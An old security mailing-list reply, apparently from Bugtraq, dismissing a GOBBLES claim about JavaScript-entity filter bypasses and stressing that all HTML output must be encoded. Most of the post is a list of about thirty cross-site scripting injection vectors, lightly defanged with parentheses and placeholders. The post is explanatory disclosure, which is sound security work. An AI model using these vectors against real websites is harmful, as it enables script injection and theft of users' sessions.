> Only hotmail security historians like those at GOBBLES Security know of
> obscure feature in JavaScript language that make it easy to bypass thing
> like "<...>", "<script>...</script>", and "javascript:" filter for CSS
> attack using JavaScript.

This is a well-known problem and has been posted to Bugtraq before, e.g.:

  http://online.securityfocus.com/archive/1/50782
  http://online.securityfocus.com/archive/1/27386

JavaScript entities were an idiotic mistake, and have not made it into the
ECMAScript spec. Only older Netscapes support them: Netscape 6/Mozilla does
away with them, thankfully. IE has never implemented them.

> Until now, that encoding information was private knowledge of the
> underground.

Oh, puh-lease. Some of us here can actually read RFCs, you know.

> HTML string completion / HTML closure
> Doesn't need much coverage since it pretty obvious to anyone with
> rational mind.

Quite so. Doesn't need *any* coverage really. All strings must be
HTML-encoded on output to HTML, and that includes " escaping as well as &.
Sure, lots of people get this wrong, but then lots of people are idiots, and
even if you understand the issues it's easy to let one vulnerability slip
through. This is not news.

Here is a cut-n-paste collection of typical JavaScript-injection hacks you
may derive some glee from playing with. I've replaced all angle brackets with
double-round-brackets in case any AV software is feeling particularly
sensitive.
((a href="javascript#[code]"))
((div onmouseover="[code]"))
((img src="javascript:[code]"))
((img dynsrc="javascript:[code]")) [IE]
((input type="image" dynsrc="javascript:[code]")) [IE]
((bgsound src="javascript:[code]")) [IE]
&((script))[code]((/script))
&{[code]}; [N4]
((img src=&{[code]};)) [N4]
((link rel="stylesheet" href="javascript:[code]"))
((iframe src="vbscript:[code]")) [IE]
((img src="mocha:[code]")) [N4]
((img src="livescript:[code]")) [N4]
((a href="about:((script))[code]((/script))"))
((meta http-equiv="refresh" content="0;url=javascript:[code]"))
((body onload="[code]"))
((div style="background-image: url(javascript:[code]);"))
((div style="behaviour: url([link to code]);")) [IE]
((div style="binding: url([link to code]);")) [Mozilla]
((div style="width: expression([code]);")) [IE]
((style type="text/javascript"))[code]((/style)) [N4]
((object classid="clsid:..." codebase="javascript:[code]")) [IE]
((style))((!--((/style))((script))[code]//--))((/script))
((![CDATA[((!--]]))((script))[code]//--))((/script))
((!-- -- --))((script))[code]((/script))((!-- -- --))
((((script))[code]((/script))
((img src="blah"onmouseover="[code]"))
((img src="blah))" onmouseover="[code]"))
((xml src="javascript:[code]"))
((xml id="X"))((a))((b))((script))[code]((/script));((/b))((/a))((/xml))
((div datafld="b" dataformatas="html" datasrc="#X"))((/div))
[\xC0][\xBC]script))[code][\xC0][\xBC]/script)) [UTF-8; IE, Opera]

> but there can only be one CSS king, and that king is GOBBLES.

That's nice dear.

-- 
Andrew Clover
mailto:and@doxdesk.com
http://and.doxdesk.com/